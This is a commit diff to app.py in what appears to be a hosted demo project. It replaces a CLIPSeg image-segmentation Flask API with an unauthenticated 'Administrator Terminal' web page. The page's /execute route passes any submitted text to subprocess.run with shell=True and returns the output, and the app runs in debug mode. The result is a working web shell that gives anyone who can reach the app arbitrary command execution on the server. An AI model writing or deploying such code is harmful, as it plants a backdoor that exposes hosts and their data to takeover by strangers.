sigyllly commited on
Commit
81aa0cb
1 Parent(s): 59b2e32

Update app.py

Browse files
Files changed (1) hide show
  1. app.py +139 -97
app.py CHANGED
@@ -1,104 +1,146 @@
1
- from flask import Flask, request, jsonify, render_template
2
- from PIL import Image
3
- import base64
4
- from io import BytesIO
5
- from transformers import CLIPSegProcessor, CLIPSegForImageSegmentation
6
- import torch
7
- import numpy as np
8
- import matplotlib.pyplot as plt
9
- import cv2
10
 
11
  app = Flask(__name__)
12
 
13
- processor = CLIPSegProcessor.from_pretrained("CIDAS/clipseg-rd64-refined")
14
- model = CLIPSegForImageSegmentation.from_pretrained("CIDAS/clipseg-rd64-refined")
15
-
16
- def process_image(image, prompt, threshold, alpha_value, draw_rectangles):
17
- inputs = processor(
18
- text=prompt, images=image, padding="max_length", return_tensors="pt"
19
- )
20
-
21
- # predict
22
- with torch.no_grad():
23
- outputs = model(**inputs)
24
- preds = outputs.logits
25
-
26
- pred = torch.sigmoid(preds)
27
- mat = pred.cpu().numpy()
28
- mask = Image.fromarray(np.uint8(mat * 255), "L")
29
- mask = mask.convert("RGB")
30
- mask = mask.resize(image.size)
31
- mask = np.array(mask)[:, :, 0]
32
-
33
- # normalize the mask
34
- mask_min = mask.min()
35
- mask_max = mask.max()
36
- mask = (mask - mask_min) / (mask_max - mask_min)
37
-
38
- # threshold the mask
39
- bmask = mask > threshold
40
- # zero out values below the threshold
41
- mask[mask < threshold] = 0
42
-
43
- fig, ax = plt.subplots()
44
- ax.imshow(image)
45
- ax.imshow(mask, alpha=alpha_value, cmap="jet")
46
-
47
- if draw_rectangles:
48
- contours, hierarchy = cv2.findContours(
49
- bmask.astype(np.uint8), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE
50
- )
51
- for contour in contours:
52
- x, y, w, h = cv2.boundingRect(contour)
53
- rect = plt.Rectangle(
54
- (x, y), w, h, fill=False, edgecolor="yellow", linewidth=2
55
- )
56
- ax.add_patch(rect)
57
-
58
- ax.axis("off")
59
- plt.tight_layout()
60
-
61
- bmask = Image.fromarray(bmask.astype(np.uint8) * 255, "L")
62
- output_image = Image.new("RGBA", image.size, (0, 0, 0, 0))
63
- output_image.paste(image, mask=bmask)
64
-
65
- # Convert mask to base64
66
- buffered_mask = BytesIO()
67
- bmask.save(buffered_mask, format="PNG")
68
- result_mask = base64.b64encode(buffered_mask.getvalue()).decode('utf-8')
69
-
70
- # Convert output image to base64
71
- buffered_output = BytesIO()
72
- output_image.save(buffered_output, format="PNG")
73
- result_output = base64.b64encode(buffered_output.getvalue()).decode('utf-8')
74
-
75
- return fig, result_mask, result_output
76
-
77
- # Existing process_image function, copy it here
78
- # ...
79
-
80
  @app.route('/')
81
  def index():
82
- return render_template('index.html')
83
-
84
- @app.route('/api/mask_image', methods=['POST'])
85
- def mask_image_api():
86
- data = request.get_json()
87
-
88
- base64_image = data.get('base64_image', '')
89
- prompt = data.get('prompt', '')
90
- threshold = data.get('threshold', 0.4)
91
- alpha_value = data.get('alpha_value', 0.5)
92
- draw_rectangles = data.get('draw_rectangles', False)
93
-
94
- # Decode base64 image
95
- image_data = base64.b64decode(base64_image.split(',')[1])
96
- image = Image.open(BytesIO(image_data))
97
-
98
- # Process the image
99
- _, result_mask, result_output = process_image(image, prompt, threshold, alpha_value, draw_rectangles)
100
-
101
- return jsonify({'result_mask': result_mask, 'result_output': result_output})
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
102
 
103
  if __name__ == '__main__':
104
- app.run(host='0.0.0.0', port=7860, debug=True)
 
1
+ from flask import Flask, request, jsonify, render_template_string
2
+ import subprocess
 
 
 
 
 
 
 
3
 
4
  app = Flask(__name__)
5
 
6
+ # Route to the homepage with embedded HTML
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
7
  @app.route('/')
8
  def index():
9
+ html = """
10
+ <!DOCTYPE html>
11
+ <html lang="en">
12
+ <head>
13
+ <meta charset="UTF-8">
14
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
15
+ <title>Administrator Terminal</title>
16
+ <style>
17
+ body {
18
+ font-family: Arial, sans-serif;
19
+ margin: 0;
20
+ padding: 0;
21
+ background-color: #f4f4f4;
22
+ }
23
+ .container {
24
+ width: 80%;
25
+ margin: 50px auto;
26
+ padding: 20px;
27
+ background-color: white;
28
+ box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
29
+ border-radius: 10px;
30
+ }
31
+ #terminal {
32
+ width: 100%;
33
+ height: 300px;
34
+ background-color: #000;
35
+ color: #0f0;
36
+ font-family: "Courier New", Courier, monospace;
37
+ padding: 10px;
38
+ overflow-y: scroll;
39
+ white-space: pre-wrap;
40
+ border-radius: 5px;
41
+ margin-bottom: 10px;
42
+ }
43
+ #command {
44
+ width: 100%;
45
+ padding: 10px;
46
+ font-size: 1em;
47
+ margin-bottom: 10px;
48
+ border: 1px solid #ccc;
49
+ border-radius: 5px;
50
+ }
51
+ button {
52
+ padding: 10px 20px;
53
+ font-size: 1em;
54
+ border: none;
55
+ border-radius: 5px;
56
+ background-color: #28a745;
57
+ color: white;
58
+ cursor: pointer;
59
+ }
60
+ button:hover {
61
+ background-color: #218838;
62
+ }
63
+ </style>
64
+ </head>
65
+ <body>
66
+ <div class="container">
67
+ <h2>Administrator Terminal</h2>
68
+ <div id="terminal"></div>
69
+ <input type="text" id="command" placeholder="Enter command..." autofocus>
70
+ <button onclick="sendCommand()">Execute</button>
71
+ </div>
72
+
73
+ <script>
74
+ // Function to send command to the Flask server
75
+ function sendCommand() {
76
+ const command = document.getElementById('command').value;
77
+
78
+ if (command.trim() === '') {
79
+ alert('Please enter a command');
80
+ return;
81
+ }
82
+
83
+ fetch('/execute', {
84
+ method: 'POST',
85
+ headers: {
86
+ 'Content-Type': 'application/x-www-form-urlencoded'
87
+ },
88
+ body: new URLSearchParams({
89
+ 'command': command
90
+ })
91
+ })
92
+ .then(response => response.json())
93
+ .then(data => {
94
+ const terminal = document.getElementById('terminal');
95
+ if (data.stdout) {
96
+ terminal.innerHTML += '> ' + command + '\\n' + data.stdout + '\\n';
97
+ }
98
+ if (data.stderr) {
99
+ terminal.innerHTML += '> ' + command + '\\n' + data.stderr + '\\n';
100
+ }
101
+ if (data.error) {
102
+ terminal.innerHTML += '> ' + command + '\\n' + data.error + '\\n';
103
+ }
104
+ document.getElementById('command').value = '';
105
+ terminal.scrollTop = terminal.scrollHeight; // Scroll to the bottom
106
+ })
107
+ .catch(error => {
108
+ console.error('Error:', error);
109
+ });
110
+ }
111
+
112
+ // Allow pressing Enter to send the command
113
+ document.getElementById('command').addEventListener('keydown', function (e) {
114
+ if (e.key === 'Enter') {
115
+ sendCommand();
116
+ }
117
+ });
118
+ </script>
119
+ </body>
120
+ </html>
121
+ """
122
+ return render_template_string(html)
123
+
124
+ # Route to execute a command
125
+ @app.route('/execute', methods=['POST'])
126
+ def execute():
127
+ try:
128
+ # Get the command from the request
129
+ command = request.form['command']
130
+
131
+ # Execute the command and capture the output
132
+ result = subprocess.run(command, shell=True, capture_output=True, text=True)
133
+
134
+ # Return the output (stdout and stderr)
135
+ return jsonify({
136
+ 'stdout': result.stdout,
137
+ 'stderr': result.stderr
138
+ })
139
+
140
+ except Exception as e:
141
+ return jsonify({
142
+ 'error': str(e)
143
+ })
144
 
145
  if __name__ == '__main__':
146
+ app.run(debug=True)